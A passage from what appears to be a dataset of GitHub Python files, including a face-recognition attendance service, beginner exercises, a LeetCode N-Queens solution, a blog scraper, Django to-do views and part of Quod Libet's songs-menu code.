iaa.Sequential([\n iaa.Fliplr(0.5), # Membalik gambar secara horizontal dengan peluang 0.5\n iaa.GaussianBlur(sigma=(0, 0.5)), # Menambahkan efek blur dengan sigma antara 0 dan 0.5\n iaa.Affine(rotate=(-45, 45)), # Memutar gambar antara -45 dan 45 derajat\n iaa.AdditiveGaussianNoise(scale=(0, 0.1 * 255)), # Menambahkan noise Gaussian\n iaa.Multiply((0.8, 1.2), per_channel=0.2), # Mengalikan intensitas warna dengan faktor antara 0.8 dan 1.2\n iaa.LinearContrast((0.75, 1.5)), # Menambahkan kontras linear\n iaa.Crop(percent=(0, 0.1)) # Memotong sebagian gambar secara acak\n ], random_order=True) # Mengatur urutan augmentasi secara acak\n\n num_images = int(num_images)\n\n detector = MTCNN()\n\n face_detected = False # Flag untuk menandakan apakah wajah terdeteksi\n\n for i in range(num_images):\n augmented_image = seq.augment_image(np.array(image))\n augmented_image = augmented_image[:, :, :3] # Menghilangkan saluran warna keempat (alpha channel)\n detections = detector.detect_faces(augmented_image)\n\n if len(detections) > 0:\n face_detected = True\n for j, detection in enumerate(detections):\n bounding_box = detection['box']\n face_image = augmented_image[bounding_box[1]:bounding_box[1]+bounding_box[3], bounding_box[0]:bounding_box[0]+bounding_box[2]]\n output_path = os.path.join(output_dir, f\"{image_name}_{i}_{j}.jpg\")\n Image.fromarray(face_image).save(output_path)\n print(f\"Bagian wajah teraugmentasi disimpan: {output_path}\")\n\n if not face_detected:\n shutil.rmtree(folder_path) # Hapus folder parent\n return generate_response(message=\"No face detected\", status=400)\n\n # Membuka folder assets/photo_frame\n encodings = []\n employeesId = []\n\n employees_folder = os.listdir(\"assets/photo_frame\")\n\n # Perulangan akan melalui setiap dataset dalam direktori pelatihan\n for employee_folder in employees_folder:\n employee_images = os.listdir(os.path.join(\"assets/photo_frame\", employee_folder))\n\n # Loop melalui setiap gambar latih untuk orang yang saat ini\n for employee_image in employee_images:\n # Dapatkan enkode wajah untuk wajah di setiap file gambar\n face = face_recognition.load_image_file(os.path.join(\"assets/photo_frame\", employee_folder, employee_image))\n\n # Anggap seluruh gambar adalah lokasi wajah\n height, width, _ = face.shape\n face_location = (0, width, height, 0)\n face_enc = face_recognition.face_encodings(face, known_face_locations=[face_location])\n face_enc = np.array(face_enc)\n face_enc = face_enc.flatten()\n\n # Tambahkan enkode wajah untuk gambar saat ini dengan label yang sesuai (nama) ke data latihan\n encodings.append(face_enc)\n employeesId.append(employee_folder)\n\n # Bagi data menjadi set latihan dan pengujian\n uniqueId = np.unique(employeesId)\n \n encodings_train = []\n encodings_test = []\n idTrain = []\n idTest = []\n\n for id in uniqueId:\n name_encodings = [encoding for encoding, n in zip(encodings, employeesId) if n == id]\n name_labels = [n for n in employeesId if n == id]\n encodings_train_value, encodings_test_value, idTrain_value, idTest_value = train_test_split(name_encodings, name_labels, test_size=0.3, random_state=42)\n encodings_train.extend(encodings_train_value)\n encodings_test.extend(encodings_test_value)\n idTrain.extend(idTrain_value)\n idTest.extend(idTest_value)\n\n # Buat dan latih klasifikasi KNN\n knn_clf = KNNClassifier(n_neighbors=9, weights='distance')\n knn_clf.fit(encodings_train, idTrain)\n\n # Evaluasi klasifikasi pada data pengujian\n predictions = knn_clf.predict(encodings_test)\n accuracy = 
accuracy_score(idTest, predictions)\n precision = precision_score(idTest, predictions, average='weighted')\n recall = recall_score(idTest, predictions, average='weighted')\n report = classification_report(idTest, predictions)\n\n # Cetak hasil Akurasi, Presisi, Recall, dan Laporan Klasifikasi\n print(\"Akurasi:\", accuracy)\n print(\"Presisi:\", precision)\n print(\"Recall:\", recall)\n print(\"Laporan Klasifikasi:\\n\", report)\n print(\"Pelatihan selesai!\")\n\n # Simpan klasifikasi KNN yang telah dilatih\n if \"assets/model/trained_knn_model.clf\" is not None:\n with open(\"assets/model/trained_knn_model.clf\", 'wb') as f:\n pickle.dump(knn_clf, f)\n\n # Buat confusion matrix\n cm = confusion_matrix(idTest, predictions)\n class_names = np.unique(employeesId)\n\n plt.figure(figsize=(15, 15))\n sns.heatmap(cm, annot=True, fmt='d', cmap='Blues', xticklabels=class_names, yticklabels=class_names)\n plt.title('Confusion Matrix')\n plt.xlabel('Predicted Label')\n plt.ylabel('True Label')\n plt.xticks(rotation=45)\n plt.savefig('assets/model/confusion_Matrix.png')\n\n return generate_response(message=\"Photos saved successfully.\", status=200)\n\n# ========================================\n# Face detection for attendance validation\n# ========================================\ndef compare_faces(request):\n employee_id = request.form.get('employeeid')\n photo = request.files.get('photo')\n\n # Membaca konten file foto sebagai bytes\n photo_bytes = photo.read()\n\n # Membuat objek BytesIO dari bytes foto\n photo_bytesio = BytesIO(photo_bytes)\n\n accuracy = 0\n employee_folder_name = \"\"\n\n # load .clf\n with open(\"assets/model/trained_knn_model.clf\", 'rb') as f:\n knn_clf = pickle.load(f)\n \n image = face_recognition.load_image_file(photo_bytesio)\n X_face_locations = face_recognition.face_locations(image)\n \n if len(X_face_locations) != 0:\n # Find encodings for faces in the test iamge\n faces_encodings = face_recognition.face_encodings(image, known_face_locations=X_face_locations)\n\n # Use the KNN model to find the best matches for the test face\n closest_distances = knn_clf.kneighbors(faces_encodings, n_neighbors=1)\n are_matches = [closest_distances[0][i][0] <= 0.4 for i in range(len(X_face_locations))]\n predictions = [(pred, loc) if rec else (\"unknown\", loc) for pred, loc, rec in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches)]\n lp = 0\n\n for name, (top, right, bottom, left) in predictions:\n accuracy = closest_distances[0][lp][0]\n employee_folder_name = name\n lp = lp + 1\n\n if(employee_folder_name == \"\"):\n return generate_response(message=\"no face\", status=400)\n else:\n print(f\"folder: {employee_folder_name}\")\n if(f\"employee_{employee_id}\" == employee_folder_name):\n return generate_response(message=f\"face confirmed. accuracy {accuracy}%\", status=200)\n else:\n return generate_response(message=\"face mismatch\", status=400)\n","repo_name":"korospace/absensi_pegawai_facedetection","sub_path":"face_detection/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":9252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3106347754","text":"\"\"\"An isogram is a word that has no duplicate letters. 
\nCreate a function that takes a string and returns either \nTrue or False depending on whether or not it's an 'isogram'.\nExamples\n'Algorism' ➞ True\n'PasSword' ➞ False\n# Not case sensitive.\n'Consecutive' ➞ False\"\"\"\n\n\n\nword = input(\"type some word ->\")\n\nclean_word = word.lower()\nletters = set(clean_word)\n\nresult = len(letters) == len(clean_word)\n\nprint(result)","repo_name":"avagyani/Python_course","sub_path":"Week4/Week4_1/Homework_10.py","file_name":"Homework_10.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15899151240","text":"#contoh 1 \n# def siapa_karakterOverPower_onePiece(): #fungsi \n# print('luffy','zoro','sanji') \n\n# siapa_karakterOverPower_onePiece() \n# siapa_karakterOverPower_onePiece() \n# siapa_karakterOverPower_onePiece() \n\n#contoh 2 \n#kita akan membuat beberapa function \n# def alim(): #nama funngsiya bebas yah \n# print('hay lim') \n# def one_piece(): \n# print('oy luffy') \n# def naruto(): \n# print('aku pasti akan menjadi hokage') \n\n# alim() \n# one_piece() \n# naruto() \n\n#ok neks variabel dalam function \n#contoh \n# def hitung_luas_segitiga(): \n# alas = 5\n# tinggi = 10\n# luas = (alas * tinggi) /2 \n# print('luas segitiga = ', luas) \n\n# hitung_luas_segitiga() \n \n#latihan menghitung luas segitiga dan volume : \n\ndef hitung_luas(alas , tinggi , luas): \n alas =() \n tinggi = () \n luas = (alas * tinggi ) / 2 \n \ndef volume_balok(alas,tinggi,volume): \n alas = () \n tinggi = () \n volume =(alas * tinggi) / 2 \n \n alas = (5) \n tinggi = (10) \n \nhitung_luas() \nvolume_balok() \n#kalo teman teman mengikuti cara yg di atas otomatis program teman\" akan error karna itu struktur programmnya salah\n#teman teman harus mengikuti contoh program yang saya share di bawah ini \n \ndef hitung_luas(): \n alas = 10 \n tinggi = 5 \n luas = (alas * tinggi) / 2 \n print('luasnya =' , luas) \ndef hitung_volume(): \n a = 5 \n b = 2 \n volume = (a * b) / 2 \n print('volumenya = ' , volume) \n\nhitung_luas() \nhitung_volume() \n\n#sekian untuk hari ini \n#terimakasih \n\n\n\n \n\n\n\n\n\n\n","repo_name":"AlimRabbani/RPL-1-DASAR-PHYTON-","sub_path":"fungsi.py","file_name":"fungsi.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31189614367","text":"# @before-stub-for-debug-begin\nfrom python3problem51 import *\nfrom typing import *\n# @before-stub-for-debug-end\n\n#\n# @lc app=leetcode.cn id=51 lang=python3\n#\n# [51] N 皇后\n#\n\n# @lc code=start\nclass Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n # if n == 1:\n # return [[\"Q\"]]\n res = []\n pth = []\n matrix = [[1]* n for _ in range(n)]\n di = {}\n for i in range(n):\n di[i] = \".\"*(i) + \"Q\" + \".\"*(n-i-1)\n\n def off(r, c):\n offset = set()\n for i in range(n):\n if matrix[i][c]:\n matrix[i][c] = 0\n offset.add((i, c))\n for j in range(n):\n if matrix[r][j]:\n matrix[r][j] = 0\n offset.add((r, j))\n k = 1\n while k < n:\n for a,b in [(k,k), (k,-k), (-k, k), (-k, -k)]:\n a += r\n b += c\n if 0<=a<n and 0<=b<n and matrix[a][b]:\n matrix[a][b] = 0\n offset.add((a, b))\n k += 1\n return offset\n\n def back(offset):\n for i,j in offset:\n matrix[i][j] = 1\n \n def backtracking(depth):\n if depth == n:\n res.append(pth[:])\n return True\n\n for i in range(n):\n for j in range(n):\n if matrix[i][j]:\n if i != depth: # 剪枝,\n continue # 第i个皇后必须放在第i行\n pth.append(di[j]) # ((i, 
j))\n # pth.append(j)\n offset = off(i, j) # 将皇后可达位置涂黑\n backtracking(depth+1)\n back(offset) # 恢复上一个皇后涂黑的位置\n pth.pop()\n \n backtracking(0)\n print(res)\n return res\n\n\"\"\"\nAccepted\n9/9 cases passed (176 ms)\nYour runtime beats 8.19 % of python3 submissions\nYour memory usage beats 67.3 % of python3 submissions (15.2 MB)\n\"\"\"\n\n# @lc code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"51.n-皇后.py","file_name":"51.n-皇后.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11601690721","text":"import json\n\nfrom lightspider import Spider, light, get_response\nfrom lxml import etree\n\n\ndef clean_str(x):\n if isinstance(x, str):\n return x.strip()\n elif isinstance(x, list):\n return [item.strip() for item in x]\n\n\ndef extract(html):\n paras = html.xpath('./p|./h1|./h2|./h3|./h4|./h5|./ul|./ol|./figure|./div[@class=\"table-container\"]')\n if not paras:\n return html.xpath('string(.)')\n result = []\n\n for para in paras:\n if para.xpath('name(.)') == 'p':\n if para.xpath('.//img'):\n result.append({\n 'type': 'img',\n 'href': para.xpath('string(.//img/@src)').strip()\n })\n elif para.xpath('.//figure'):\n result.append({\n 'type': 'p',\n 'text': '\\n'.join(para.xpath('./text()'))\n })\n result.extend(extract(para))\n else:\n result.append({\n 'type': 'p',\n 'text': para.xpath('string(.)').strip()\n })\n elif para.xpath('name(.)') == 'figure':\n code_type = para.xpath('string(./@class)').split()[-1]\n code_lines = []\n for code_line in para.xpath('.//td[@class=\"code\"]//span[@class=\"line\"]'):\n code_lines.append(code_line.xpath('string(.)'))\n result.append({\n 'type': 'code',\n 'code': {\n 'type': code_type,\n 'source': '\\n'.join(code_lines)\n }\n })\n elif para.xpath('string(./@class)') == 'table-container':\n headers = para.xpath('.//th/text()')\n rows = [x.xpath('.//td/text()') for x in para.xpath('.//tbody//tr')]\n result.append({\n 'type': 'table',\n 'table': {\n 'headers': headers,\n 'rows': rows\n }\n })\n elif para.xpath('name(.)') in ['ol', 'ul']:\n result.append({\n 'type': para.xpath('name(.)'),\n 'lis': [extract(x) for x in para.xpath('./li')]\n })\n else:\n result.append({\n 'type': para.xpath('name(.)'),\n 'text': para.xpath('string(.)').strip()\n })\n return result\n\n@light\ndef parser(response):\n html = etree.HTML(response.text)\n title = clean_str(html.xpath('string(//h1[@class=\"title\"])'))\n content = extract(html.xpath('//div[@class=\"article-entry\"]')[0])\n created_time = clean_str(html.xpath('string(//div[@id=\"header-meta\"]//time)'))\n categories = clean_str(html.xpath('//div[@id=\"header-meta\"]//div[@class=\"metatag cats\"]//a/text()'))\n latest_time = clean_str(html.xpath('string(//section[@id=\"footer-meta\"]//time)'))\n tags = clean_str(html.xpath('//section[@id=\"footer-meta\"]//div[@class=\"metatag tags\"]//a/text()'))\n return {\n 'title': title,\n 'content': content,\n 'created_time': created_time,\n 'categories': categories,\n 'latest_time': latest_time,\n 'tags': tags,\n 'url': response.url\n }, None\n\n\nif __name__ == '__main__':\n base_url = r'http://www.lightsmile.cn{}'\n archives_url = r'http://www.lightsmile.cn/archives'\n archives_res = get_response(archives_url)\n archives_html = etree.HTML(archives_res.text)\n section = archives_html.xpath('//section[@class=\"archive\"]')[0]\n archives = section.xpath('.//a')\n tasks = []\n for archive in archives:\n tasks.append(archive.xpath('string(./@href)'))\n save_format = 
'json'\n\n spider = Spider(base_url=base_url, save_format=save_format, save_path=r'D:\\Data\\NLP\\corpus\\my_blogs_test')\n spider.run(tasks, parser)\n # test_url = base_url.format(tasks[39])\n # test_res = get_response(test_url)\n # test_result = parser(test_res)\n # print(test_result)\n # test_url = base_url.format(tasks[39])\n # test_res = get_response(test_url)\n # test_result = parser(test_res)\n","repo_name":"smilelight/lightSpider","sub_path":"examples/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"27179424145","text":"from django.shortcuts import redirect, render\nfrom django.http import HttpRequest\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group\nfrom django.contrib import messages\n\nfrom core.forms import *\nfrom . import models\nfrom . import utils\n\n# Create your views here.\n\n@utils.logout_required(redirect_url=\"tasks\")\ndef register_user(request: HttpRequest):\n form = NewUserForm()\n\n context = {\"form\": form}\n\n if request.method == \"POST\":\n form = NewUserForm(request.POST)\n\n if(form.is_valid()):\n form.save()\n user = authenticate(username=form.cleaned_data[\"username\"], password=form.cleaned_data[\"password1\"])\n\n newList = models.TaskList(user=user)\n newList.save()\n\n if(user is not None):\n print(\"hello\")\n login(request, user)\n \n return redirect(\"tasks\")\n else:\n placeholders = {\"min_length\": 9, \"model_name\": \"User\", \"field_label\": \"email\"}\n utils.process_form_errors(form.errors.as_data(), context, placeholders)\n\n print(context)\n return render(request, \"core/register.html\", context)\n\n@utils.logout_required(redirect_url=\"tasks\")\ndef login_user(request):\n form = LoginForm()\n context = {\"form\": form}\n\n if request.method == \"POST\":\n form:LoginForm = LoginForm(request.POST)\n\n if(form.is_valid()):\n user = authenticate(username=form.cleaned_data['username'], password=form.cleaned_data['password'])\n if(user is not None):\n login(request, user)\n\n return redirect(\"tasks\")\n else:\n messages.error(request, \"User not found\")\n else:\n print(form.errors.as_data())\n utils.process_form_errors(form.errors.as_data(), context, {})\n\n return render(request, \"core/login.html\", context)\n\n@login_required(login_url=\"login\")\n@utils.group_required(group_name=\"Verified\", redirect_url=\"verify\")\ndef get_tasks(request: HttpRequest):\n\n user = request.user\n form = TaskForm()\n\n tasklisk:models.TaskList = models.TaskList.objects.get(user=user).task_set.all()\n \n return render(request, \"core/tasks.html\", {\"tasklist\": tasklisk, \"form\": form})\n\n@login_required(login_url=\"login\")\n@utils.group_required(group_name=\"Verified\", redirect_url=\"verify\")\ndef create_task(request: HttpRequest):\n \n context = {\"task\":request.POST[\"task\"], \"tasklist\":models.TaskList.objects.get(user=request.user)}\n newTask = models.Task(task=context[\"task\"], tasklist=context[\"tasklist\"])\n newTask.save()\n\n return redirect(\"tasks\")\n\n@login_required(login_url=\"login\")\n@utils.group_required(group_name=\"Verified\", redirect_url=\"verify\")\ndef delete_task(request: HttpRequest, pk: int):\n task:models.Task = models.Task.objects.get(id=pk)\n\n if(request.method == \"POST\"):\n task.delete()\n\n return redirect(\"tasks\")\n\n@login_required(login_url=\"login\")\ndef 
logout_user(request: HttpRequest):\n logout(request)\n\n return redirect(\"login\")\n\n@login_required(login_url=\"login\")\n@utils.group_unrequired(group_name=\"Verified\", redirect_url=\"tasks\")\ndef verify_user(request: HttpRequest):\n valid:models.UserValidation = utils.get_validation(request.user)\n\n if(valid == None):\n valid = models.UserValidation(user=request.user)\n valid.save()\n elif(valid.expired(30)):\n valid.generate_new_code()\n \n form = ValidationForm()\n context = {\"form\": form}\n\n if(request.method == \"POST\"):\n form = ValidationForm(request.POST)\n if(form.is_valid()):\n if(request.POST[\"code\"] == valid.code):\n group:Group = Group.objects.get(name=\"Verified\")\n group.user_set.add(request.user)\n valid.delete()\n\n return redirect(\"tasks\")\n else:\n messages.error(request, \"The codes don't match\")\n else:\n utils.process_form_errors(form.errors.as_data(), context, {})\n\n if(valid.sent == False):\n sent = utils.send_verify_email(request, valid)\n\n if(sent == 1):\n valid.sent = True\n valid.save()\n else:\n messages.error(request, \"Can't send to given email\")\n\n return render(request, \"core/verify.html\", context)\n\n@login_required(login_url=\"login\")\n@utils.group_unrequired(group_name=\"Verified\", redirect_url=\"tasks\")\ndef resend_verification(request: HttpRequest):\n if(request.method == \"POST\"):\n validation: models.UserValidation = utils.get_validation(request.user)\n if(validation is not None and validation.expired(1)):\n validation.generate_new_code()\n utils.send_verify_email(request, validation)\n\n return redirect(\"verify\")","repo_name":"Zantron2000/ToDoList","sub_path":"ToDoList/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74991357811","text":"from gi.repository import Gtk\n\nfrom quodlibet.formats import AudioFile\nfrom quodlibet.plugins.gui import MenuItemPlugin\nfrom quodlibet.plugins.songshelpers import is_a_file\nfrom quodlibet.qltk.chooser import choose_folders\nfrom quodlibet.qltk.download import DownloadProgress\nfrom quodlibet.qltk.pluginwin import PluginWindow\n\nfrom quodlibet import ngettext, _, print_d, app, util\nfrom quodlibet import qltk\nfrom quodlibet.errorreport import errorhook\nfrom quodlibet.qltk.showfiles import show_songs\n\nfrom quodlibet.util import print_e, print_w, copool\nfrom quodlibet.qltk.msg import ConfirmationPrompt, ErrorMessage, Message\nfrom quodlibet.qltk.delete import TrashMenuItem, trash_songs\nfrom quodlibet.qltk.information import Information\nfrom quodlibet.qltk.properties import SongProperties\nfrom quodlibet.qltk.x import SeparatorMenuItem\nfrom quodlibet.qltk.ratingsmenu import RatingsMenuItem\nfrom quodlibet.qltk import get_top_parent, get_menu_item_top_parent, Icons\nfrom quodlibet.plugins import PluginManager, PluginHandler\nfrom quodlibet.plugins.songsmenu import SongsMenuPlugin\nfrom quodlibet.util.songwrapper import list_wrapper, check_wrapper_changed\n\n\ndef confirm_song_removal_invoke(parent, songs):\n songs = set(songs)\n if not songs:\n return True\n\n count = len(songs)\n song = next(iter(songs))\n if count == 1:\n title = _('Remove track: \"%(title)s\" from the library?') % {\n \"title\": song(\"title\") or song(\"~basename\")}\n else:\n title = _(\"Remove %(count)d tracks from the library?\") % {\n \"count\": count}\n\n prompt = ConfirmationPrompt(parent, title, \"\", _(\"Remove from Library\"),\n 
ok_button_icon=Icons.LIST_REMOVE)\n return prompt.run() == ConfirmationPrompt.RESPONSE_INVOKE\n\n\ndef confirm_multi_song_invoke(parent, plugin_name, count):\n \"\"\"Dialog to confirm invoking a plugin with X songs in case X is high\"\"\"\n title = ngettext('Run the plugin \"%(name)s\" on %(count)d song?',\n 'Run the plugin \"%(name)s\" on %(count)d songs?',\n count) % {\"name\": plugin_name, \"count\": count}\n description = \"\"\n ok_text = _(\"_Run Plugin\")\n prompt = ConfirmationPrompt(parent, title, description, ok_text).run()\n return prompt == ConfirmationPrompt.RESPONSE_INVOKE\n\n\ndef confirm_multi_album_invoke(parent, plugin_name, count):\n \"\"\"Dialog to confirm invoking a plugin with X albums in case X is high\"\"\"\n title = ngettext('Run the plugin \"%(name)s\" on %(count)d album?',\n 'Run the plugin \"%(name)s\" on %(count)d albums?',\n count) % {\"name\": plugin_name, \"count\": count}\n description = \"\"\n ok_text = _(\"_Run Plugin\")\n prompt = ConfirmationPrompt(parent, title, description, ok_text).run()\n return prompt == ConfirmationPrompt.RESPONSE_INVOKE\n\n\nclass SongsMenuPluginHandler(PluginHandler):\n\n def __init__(self, song_confirmer=None, album_confirmer=None):\n \"\"\"custom confirmers for testing\"\"\"\n\n self.__plugins = []\n\n self._confirm_multiple_songs = confirm_multi_song_invoke\n if song_confirmer is not None:\n self._confirm_multiple_songs = song_confirmer\n\n self._confirm_multiple_albums = confirm_multi_album_invoke\n if album_confirmer is not None:\n self._confirm_multiple_albums = album_confirmer\n\n def Menu(self, library, songs):\n songs = list_wrapper(songs)\n\n attrs = [\"plugin_song\", \"plugin_songs\",\n \"plugin_album\", \"plugin_albums\"]\n\n if len(songs) == 1:\n attrs.append(\"plugin_single_song\")\n\n last = (songs and songs[-1]) or None\n for song in songs:\n if song.album_key != last.album_key:\n break\n last = song\n else:\n attrs.append(\"plugin_single_album\")\n\n items = []\n kinds = self.__plugins\n kinds.sort(key=lambda plugin: plugin.PLUGIN_ID)\n for Kind in kinds:\n usable = any(callable(getattr(Kind, s)) for s in attrs)\n if usable:\n try:\n items.append(Kind(songs, library))\n except Exception:\n print_e(\"Couldn't initialise song plugin %s. 
Stack trace:\"\n % Kind)\n errorhook()\n items = [i for i in items if i.initialized]\n\n if items:\n menu = Gtk.Menu()\n for item in items:\n try:\n menu.append(item)\n args = (library, songs)\n if item.get_submenu():\n for subitem in item.get_submenu().get_children():\n subitem.connect(\n \"activate\", self.__on_activate, item, *args)\n else:\n item.connect(\n \"activate\", self.__on_activate, item, *args)\n except Exception:\n errorhook()\n item.destroy()\n menu.append(SeparatorMenuItem())\n prefs = Gtk.MenuItem(label=_(\"Configure Plugins…\"))\n prefs.connect(\"activate\", lambda _: PluginWindow().show())\n menu.append(prefs)\n\n else:\n menu = None\n return menu\n\n def __get_albums(self, songs):\n albums = {}\n for song in songs:\n key = song.album_key\n if key not in albums:\n albums[key] = []\n albums[key].append(song)\n\n albums = list(albums.values())\n for album in albums:\n album.sort()\n return albums\n\n def handle(self, plugin_id, library, parent, songs):\n \"\"\"Start a song menu plugin directly without a menu\"\"\"\n\n parent = get_top_parent(parent)\n\n for plugin in self.__plugins:\n if plugin.PLUGIN_ID == plugin_id:\n songs = list_wrapper(songs)\n try:\n plugin = plugin(songs, library)\n except Exception:\n errorhook()\n else:\n self.__handle(plugin, plugin, library, songs, parent)\n return\n\n def __on_activate(self, item, plugin, library, songs):\n parent = get_menu_item_top_parent(item)\n self.__handle(item, plugin, library, songs, parent)\n\n def __handle(self, item, plugin, library, songs, parent):\n if len(songs) == 0:\n return\n\n try:\n if len(songs) == 1 and callable(plugin.plugin_single_song):\n try:\n ret = plugin.plugin_single_song(songs[0])\n except Exception:\n errorhook()\n else:\n if ret:\n return\n if callable(plugin.plugin_song):\n total = len(songs)\n if total > plugin.MAX_INVOCATIONS:\n if not self._confirm_multiple_songs(\n parent, plugin.PLUGIN_NAME, total):\n return\n\n try:\n ret = map(plugin.plugin_song, songs)\n except Exception:\n errorhook()\n else:\n if any(ret):\n return\n if callable(plugin.plugin_songs):\n try:\n ret = plugin.plugin_songs(songs)\n except Exception:\n errorhook()\n else:\n if ret:\n return\n\n if plugin.handles_albums:\n albums = self.__get_albums(songs)\n total = len(albums)\n if total > plugin.MAX_INVOCATIONS:\n if not self._confirm_multiple_albums(\n parent, plugin.PLUGIN_NAME, total):\n return\n\n if callable(plugin.plugin_single_album) and len(albums) == 1:\n try:\n ret = plugin.plugin_single_album(albums[0])\n except Exception:\n errorhook()\n else:\n if ret:\n return\n if callable(plugin.plugin_album):\n try:\n ret = map(plugin.plugin_album, albums)\n except Exception:\n errorhook()\n else:\n if any(ret):\n return\n if callable(plugin.plugin_albums):\n try:\n ret = plugin.plugin_albums(albums)\n except Exception:\n errorhook()\n else:\n if ret:\n return\n\n finally:\n check_wrapper_changed(library, filter(None, songs))\n\n def plugin_handle(self, plugin):\n return issubclass(plugin.cls, SongsMenuPlugin)\n\n def plugin_enable(self, plugin):\n self.__plugins.append(plugin.cls)\n\n def plugin_disable(self, plugin):\n self.__plugins.remove(plugin.cls)\n\n\nclass SongsMenu(Gtk.Menu):\n plugins = SongsMenuPluginHandler()\n\n @classmethod\n def init_plugins(cls):\n PluginManager.instance.register_handler(cls.plugins)\n\n def __init__(self, library, songs, plugins=True, playlists=True, queue=True,\n remove=True, delete=False, edit=True, info=True, ratings=True,\n show_files=True, download=False, items=None, accels=True,\n 
removal_confirmer=None, folder_chooser=None):\n super().__init__()\n # The library may actually be a librarian; if it is, use it,\n # otherwise find the real librarian.\n librarian = getattr(library, \"librarian\", library)\n\n if ratings:\n ratings_item = RatingsMenuItem(songs, librarian)\n ratings_item.set_sensitive(bool(songs))\n self.append(ratings_item)\n self.separate()\n\n # external item groups\n for subitems in reversed(items or []):\n self.separate()\n for item in subitems:\n self.append(item)\n self.separate()\n\n if plugins:\n submenu = self.plugins.Menu(librarian, songs)\n if submenu is not None:\n b = qltk.MenuItem(_(\"_Plugins\"), Icons.SYSTEM_RUN)\n b.set_sensitive(bool(songs))\n self.append(b)\n b.set_submenu(submenu)\n self.append(SeparatorMenuItem())\n\n in_lib = True\n can_add = True\n is_file = True\n for song in songs:\n if song not in library:\n in_lib = False\n if not song.can_add:\n can_add = False\n if not song.is_file:\n is_file = False\n\n if playlists:\n self.init_playlists(can_add, library, songs)\n if queue:\n self.init_queue(accels, can_add, songs)\n\n if remove or delete:\n self.separate()\n\n if remove:\n self.init_remove(in_lib, library, removal_confirmer, remove, songs)\n\n if delete:\n self.init_delete(accels, delete, is_file, songs, librarian)\n\n if edit:\n self.init_edit(accels, songs, librarian)\n\n if info:\n self.init_info(accels, songs, librarian)\n\n if show_files and any(is_a_file(s) for s in songs):\n self.init_show_files(songs)\n\n if download:\n self.init_download(songs, folder_chooser)\n\n def selection_done_cb(menu):\n menu.destroy()\n\n self.connect(\"selection-done\", selection_done_cb)\n\n def init_download(self, songs, folder_chooser):\n def is_downloadable(song: AudioFile):\n return bool(not song.is_file and song.get(\"~uri\", False))\n\n self.separate()\n relevant = [s for s in songs if is_downloadable(s)]\n total = len(relevant)\n text = ngettext(\n \"_Download file…\",\n \"_Download %(total)d files…\", total) % {\"total\": total}\n b = qltk.MenuItem(text, Icons.EMBLEM_DOWNLOADS)\n b.set_sensitive(relevant\n and len(relevant) < MenuItemPlugin.MAX_INVOCATIONS)\n\n def _finished(p, successes, failures):\n msg = (f\"{util.bold(successes)} \" + _(\"successful\") +\n f\"\\n{util.bold(failures)} \" + _(\"failed\"))\n print_d(msg.replace(\"\\n\", \"; \"))\n warning = Message(Gtk.MessageType.INFO, app.window,\n _(\"Downloads complete\"), msg, escape_desc=False)\n warning.run()\n\n def download_cb(menu_item):\n songs = relevant\n total = len(songs)\n msg = ngettext(\"Download {name!r} to\",\n \"Download {total} files to\",\n total)\n msg = msg.format(name=next(iter(songs))(\"title\")[:99] if total else \"?\",\n total=total)\n chooser = folder_chooser or choose_folders\n paths = chooser(None, msg, _(\"Download here\"), allow_multiple=False)\n if not paths:\n print_d(\"Cancelling download\")\n return\n path = paths[0]\n progress = DownloadProgress(songs)\n\n progress.connect(\"finished\", _finished)\n copool.add(progress.download_songs, path)\n\n b.connect(\"activate\", download_cb)\n self.append(b)\n\n def init_show_files(self, songs):\n def show_files_cb(menu_item):\n print_d(\"Trying to show files...\")\n if not show_songs(songs):\n parent = get_menu_item_top_parent(menu_item)\n msg = ErrorMessage(parent,\n _(\"Unable to show files\"),\n _(\"Error showing files, \"\n \"or no program available to show them.\"))\n msg.run()\n\n self.separate()\n total = len([s for s in songs if is_a_file(s)])\n text = ngettext(\n \"_Show in File Manager\",\n 
\"_Show %(total)d Files in File Manager\", total) % {\"total\": total}\n b = qltk.MenuItem(text, Icons.DOCUMENT_OPEN)\n b.set_sensitive(bool(songs)\n and len(songs) < MenuItemPlugin.MAX_INVOCATIONS)\n b.connect(\"activate\", show_files_cb)\n self.append(b)\n\n def init_info(self, accels, songs, librarian):\n b = qltk.MenuItem(_(\"_Information\"), Icons.DIALOG_INFORMATION)\n b.set_sensitive(bool(songs))\n if accels:\n qltk.add_fake_accel(b, \"<Primary>I\")\n\n def information_cb(menu_item):\n parent = get_menu_item_top_parent(menu_item)\n window = Information(librarian, songs, parent)\n window.show()\n\n b.connect(\"activate\", information_cb)\n self.append(b)\n\n def init_edit(self, accels, songs, librarian):\n self.separate()\n b = qltk.MenuItem(_(\"Edit _Tags\"), Icons.EDIT)\n b.set_sensitive(bool(songs))\n if accels:\n qltk.add_fake_accel(b, \"<alt>Return\")\n\n def song_properties_cb(menu_item):\n parent = get_menu_item_top_parent(menu_item)\n window = SongProperties(librarian, songs, parent)\n window.show()\n\n b.connect(\"activate\", song_properties_cb)\n self.append(b)\n\n def init_delete(self, accels, delete, is_file, songs, librarian):\n if callable(delete):\n b = qltk.MenuItem(_(\"_Delete\"), Icons.EDIT_DELETE)\n b.connect(\"activate\", lambda item: delete(songs))\n if accels:\n qltk.add_fake_accel(b, \"<Primary>Delete\")\n else:\n b = TrashMenuItem()\n if accels:\n qltk.add_fake_accel(b, \"<Primary>Delete\")\n\n def 